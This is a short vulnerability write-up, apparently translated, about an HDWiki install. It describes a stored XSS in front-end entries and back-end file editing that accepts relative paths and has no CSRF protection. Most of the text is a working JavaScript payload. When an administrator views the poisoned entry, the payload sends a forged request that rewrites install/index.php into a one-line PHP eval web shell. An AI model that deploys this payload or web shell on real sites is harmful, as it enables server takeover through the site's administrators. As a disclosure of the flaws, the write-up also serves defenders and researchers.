Two major problems: 1. When a front-end entry is created, the inserted content is only filtered for sensitive code by the editor's client-side JavaScript; once the entry reaches the server, no strict server-side filtering is applied, which results in a stored XSS. 2. When editing files in the back end, the use of relative paths is not restricted: files can be edited directly through relative paths (the file list displays absolute paths by default), and in addition the file location is not verified and the edit request is not protected against CSRF. Getshell usage: (ordinary user) create a front-end entry: publish it, intercept and modify the packet: insert the prepared JavaScript code here, which edits the content of install/index.php into a one-sentence Trojan. The content is as follows:
function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } return request; } var _x = ajax(); postgo(); function postgo() { src="http://127.0.0.1/hdwiki/index.php?admin_filemanager-edit"; data="fname=install%2Findex.php&dir=.%2F&content=%3C%3Fphp+eval%28%24_POST%5Bc%5D%29%3B%3F%3E&dosubmit=+%E7%A1%AE%E8%AE%A4%E4%BF%AE%E6%94%B9+"; xhr_act("POST",src,data); } function xhr_act(_m,_s,_a){ _x.open(_m,_s,false); if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); _x.send(_a); return _x.responseText; }
Submit to publish. (Administrator account) Log in to the back end and view the user-created entry; the CSRF then triggers the getshell: